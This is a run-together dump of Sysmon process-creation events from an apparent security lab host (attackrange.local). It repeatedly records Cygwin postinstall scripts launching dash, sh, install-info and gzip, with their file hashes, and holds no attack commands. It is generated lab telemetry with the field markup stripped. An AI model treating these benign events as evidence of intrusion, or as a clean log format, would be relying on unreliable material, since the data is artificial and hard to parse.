"/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.221{A8622C2F-53FF-6078-180B-00000000AE01}5412C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-170B-00000000AE01}5804C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054240Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.206{A8622C2F-53FF-6078-170B-00000000AE01}5804C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-160B-00000000AE01}5640C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.198{A8622C2F-53FF-6078-160B-00000000AE01}5640C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-150B-00000000AE01}2824C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.191{A8622C2F-53FF-6078-150B-00000000AE01}2824C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054207Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.182{A8622C2F-53FF-6078-140B-00000000AE01}6808C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-130B-00000000AE01}2676C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.167{A8622C2F-53FF-6078-130B-00000000AE01}2676C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-120B-00000000AE01}5852C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054185Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.159{A8622C2F-53FF-6078-120B-00000000AE01}5852C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-110B-00000000AE01}2408C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.152{A8622C2F-53FF-6078-110B-00000000AE01}2408C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054164Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.142{A8622C2F-53FF-6078-100B-00000000AE01}3136C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-0F0B-00000000AE01}1392C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054154Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.127{A8622C2F-53FF-6078-0F0B-00000000AE01}1392C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-0E0B-00000000AE01}5832C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054141Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.118{A8622C2F-53FF-6078-0E0B-00000000AE01}5832C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-0D0B-00000000AE01}616C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054131Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.111{A8622C2F-53FF-6078-0D0B-00000000AE01}616C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054120Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.102{A8622C2F-53FF-6078-0C0B-00000000AE01}1844C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-0B0B-00000000AE01}5620C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054110Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.086{A8622C2F-53FF-6078-0B0B-00000000AE01}5620C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-0A0B-00000000AE01}6336C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054098Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.078{A8622C2F-53FF-6078-0A0B-00000000AE01}6336C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-090B-00000000AE01}4288C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.071{A8622C2F-53FF-6078-090B-00000000AE01}4288C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.060{A8622C2F-53FF-6078-080B-00000000AE01}2484C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-070B-00000000AE01}1580C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054067Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.044{A8622C2F-53FF-6078-070B-00000000AE01}1580C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-060B-00000000AE01}6064C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054055Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.036{A8622C2F-53FF-6078-060B-00000000AE01}6064C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FF-6078-050B-00000000AE01}3788C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054045Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.028{A8622C2F-53FF-6078-050B-00000000AE01}3788C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054034Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.992{A8622C2F-53FE-6078-040B-00000000AE01}6492C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FE-6078-030B-00000000AE01}5212C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054024Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.976{A8622C2F-53FE-6078-030B-00000000AE01}5212C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FE-6078-020B-00000000AE01}3200C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054012Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.968{A8622C2F-53FE-6078-020B-00000000AE01}3200C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FE-6078-010B-00000000AE01}4036C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054002Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.961{A8622C2F-53FE-6078-010B-00000000AE01}4036C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053991Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.953{A8622C2F-53FE-6078-000B-00000000AE01}4300C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FE-6078-FF0A-00000000AE01}2408C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000053981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.937{A8622C2F-53FE-6078-FF0A-00000000AE01}2408C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FE-6078-FE0A-00000000AE01}4568C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000053969Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.929{A8622C2F-53FE-6078-FE0A-00000000AE01}4568C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FE-6078-FD0A-00000000AE01}1536C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053959Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.922{A8622C2F-53FE-6078-FD0A-00000000AE01}1536C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053948Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.913{A8622C2F-53FE-6078-FC0A-00000000AE01}1100C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FE-6078-FB0A-00000000AE01}616C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000053938Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.897{A8622C2F-53FE-6078-FB0A-00000000AE01}616C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FE-6078-FA0A-00000000AE01}5052C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000053926Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.889{A8622C2F-53FE-6078-FA0A-00000000AE01}5052C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FE-6078-F90A-00000000AE01}1628C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053916Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.881{A8622C2F-53FE-6078-F90A-00000000AE01}1628C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053905Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.871{A8622C2F-53FE-6078-F80A-00000000AE01}5516C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FE-6078-F70A-00000000AE01}4288C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000053895Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.855{A8622C2F-53FE-6078-F70A-00000000AE01}4288C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FE-6078-F60A-00000000AE01}7140C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000053883Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.847{A8622C2F-53FE-6078-F60A-00000000AE01}7140C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FE-6078-F50A-00000000AE01}1028C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053873Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.840{A8622C2F-53FE-6078-F50A-00000000AE01}1028C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.819{A8622C2F-53FE-6078-F40A-00000000AE01}5804C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FE-6078-F30A-00000000AE01}5664C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000053852Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.803{A8622C2F-53FE-6078-F30A-00000000AE01}5664C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FE-6078-F20A-00000000AE01}6552C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000053840Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.795{A8622C2F-53FE-6078-F20A-00000000AE01}6552C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FE-6078-F10A-00000000AE01}1736C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053830Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.788{A8622C2F-53FE-6078-F10A-00000000AE01}1736C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053819Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 